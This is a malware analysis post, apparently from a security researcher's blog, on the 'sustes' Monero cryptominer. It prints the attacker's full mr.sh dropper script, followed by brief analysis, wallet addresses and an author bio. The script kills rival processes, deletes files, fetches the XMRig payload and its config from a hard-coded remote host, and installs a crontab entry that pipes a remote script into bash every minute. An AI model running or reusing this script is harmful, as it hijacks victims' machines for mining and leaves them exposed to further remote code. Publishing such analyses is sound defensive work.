#!/bin/bash
mkdir /var/tmp
chmod 777 /var/tmp
pkill -f getty
netstat -antp | grep '27.155.87.59' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '27.155.87.59' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '121.18.238.56' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '121.18.238.56' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '103.99.115.220' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '103.99.115.220' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
pkill -f /usr/bin/.sshd
rm -rf /var/tmp/j*
rm -rf /tmp/j*
rm -rf /var/tmp/java
rm -rf /tmp/java
rm -rf /var/tmp/java2
rm -rf /tmp/java2
rm -rf /var/tmp/java*
rm -rf /tmp/java*
chmod 777 /var/tmp/sustes
ps aux | grep -vw sustes | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
ps ax | grep /tmp/ | grep -v grep | grep -v 'sustes\|sustes\|ppl' | awk '{print $1}' | xargs kill -9
ps ax | grep 'wc.conf\|wq.conf\|wm.conf' | grep -v grep | grep -v 'sustes\|sustes\|ppl' | awk '{print $1}' | xargs kill -9
DIR="/var/tmp"
if [ -a "/var/tmp/sustes" ]
then
    if [ -w "/var/tmp/sustes" ] && [ ! -d "/var/tmp/sustes" ]
    then
        if [ -x "$(command -v md5sum)" ]
        then
            sum=$(md5sum /var/tmp/sustes | awk '{ print $1 }')
            echo $sum
            case $sum in
                c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
                    echo "sustes OK"
                ;;
                *)
                    echo "sustes wrong"
                    pkill -f wc.conf
                    pkill -f sustes
                    sleep 4
                ;;
            esac
        fi
        echo "P OK"
    else
        DIR=$(mktemp -d)/var/tmp
        mkdir $DIR
        echo "T DIR $DIR"
    fi
else
    if [ -d "/var/tmp" ]
    then
        DIR="/var/tmp"
    fi
    echo "P NOT EXISTS"
fi
if [ -d "/var/tmp/sustes" ]
then
    DIR=$(mktemp -d)/var/tmp
    mkdir $DIR
    echo "T DIR $DIR"
fi
WGET="wget -O"
if [ -s /usr/bin/curl ];
then
    WGET="curl -o";
fi
if [ -s /usr/bin/wget ];
then
    WGET="wget -O";
fi
f2="192.99.142.226:8220"

downloadIfNeed()
{
    if [ -x "$(command -v md5sum)" ]
    then
        if [ ! -f $DIR/sustes ]; then
            echo "File not found!"
            download
        fi
        sum=$(md5sum $DIR/sustes | awk '{ print $1 }')
        echo $sum
        case $sum in
            c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
                echo "sustes OK"
            ;;
            *)
                echo "sustes wrong"
                sizeBefore=$(du $DIR/sustes)
                if [ -s /usr/bin/curl ];
                then
                    WGET="curl -k -o ";
                fi
                if [ -s /usr/bin/wget ];
                then
                    WGET="wget --no-check-certificate -O ";
                fi
                #$WGET $DIR/sustes https://transfer.sh/wbl5H/sustes
                download
                sumAfter=$(md5sum $DIR/sustes | awk '{ print $1 }')
                if [ -s /usr/bin/curl ];
                then
                    echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sustes` > $DIR/var/tmp.txt
                fi
            ;;
        esac
    else
        echo "No md5sum"
        download
    fi
}

download() {
    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum $DIR/sustes3 | awk '{ print $1 }')
        echo $sum
        case $sum in
            c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
                echo "sustes OK"
                cp $DIR/sustes3 $DIR/sustes
            ;;
            *)
                echo "sustes wrong"
                download2
            ;;
        esac
    else
        echo "No md5sum"
        download2
    fi
}

download2() {
    if [ `getconf LONG_BIT` = "64" ]
    then
        $WGET $DIR/sustes http://192.99.142.226:8220/xm64
    fi

    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum $DIR/sustes | awk '{ print $1 }')
        echo $sum
        case $sum in
            c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
                echo "sustes OK"
                cp $DIR/sustes $DIR/sustes3
            ;;
            *)
                echo "sustes wrong"
            ;;
        esac
    else
        echo "No md5sum"
    fi
}

judge() {
    if [ ! "$(netstat -ant|grep '158.69.133.20\|192.99.142.249\|202.144.193.110'|grep 'ESTABLISHED'|grep -v grep)" ];
    then
        ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid
	      do
	      kill -9 $procid
        done
        downloadIfNeed
        touch /var/tmp/123
        pkill -f /var/tmp/java
        pkill -f w.conf
        chmod +x $DIR/sustes
        $WGET $DIR/wc.conf http://$f2/wt.conf
        nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &
        sleep 5
    else
       echo "Running"
    fi
}

judge2() {
    if [ ! "$(ps -fe|grep '/var/tmp/sustes'|grep 'wc.conf'|grep -v grep)" ];
    then
        downloadIfNeed
        chmod +x $DIR/sustes
        $WGET $DIR/wc.conf http://$f2/wt.conf
        nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &
        sleep 5
    else
        echo "Running"
    fi
}

if [ ! "$(netstat -ant|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ];
then
    judge2
else
    judge
fi

if crontab -l | grep -q "192.99.142.226:8220"
then
    echo "Cron exists"
else
    crontab -r
    echo "Cron not found"
    LDR="wget -q -O -"
    if [ -s /usr/bin/curl ];
    then
        LDR="curl";
    fi
    if [ -s /usr/bin/wget ];
    then
        LDR="wget -q -O -";
    fi
	(crontab -l 2>/dev/null; echo "* * * * * $LDR http://192.99.142.226:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab -
fi
rm -rf /var/tmp/jrm
rm -rf /tmp/jrm
pkill -f 185.222.210.59
pkill -f 95.142.40.81
pkill -f 192.99.142.232
chmod 777 /var/tmp/sustes
crontab -l | sed '/185.222.210.59/d' | crontab -

MR.SH ends up by setting a periodic crontab action on dropping and executing itself by setting up:

Following the analysis and extracting the configuration file from dropping URL we might observe the Monero wallet addresses and the Monero Pools used by attacker. The following wallets (W1, W2, W3) were found.

• W1: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
• W2: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
• W3: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg

The downloaded payload is named sustes and it is a basic XMRIG, which is a well-known opensource miner. In this scenario, it is used to make money at the expense of computer users by abusing the infected computer to mine Monero, a cryptocurrency. The following image shows the usage strings as an initial proof of software.

XMRIG prove 1

Many people are currently wondering what is the sustes process which is draining a lot of PC resources (for example: here, here and here ) …. now we have an answer: it’s an unwanted Miner. :D.

Hope you had fun

Further details including the IoC area available at:

https://marcoramilli.blogspot.com/2018/09/sustes-malware-cpu-for-monero.html

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the most biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence center I’ve ever experienced ! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans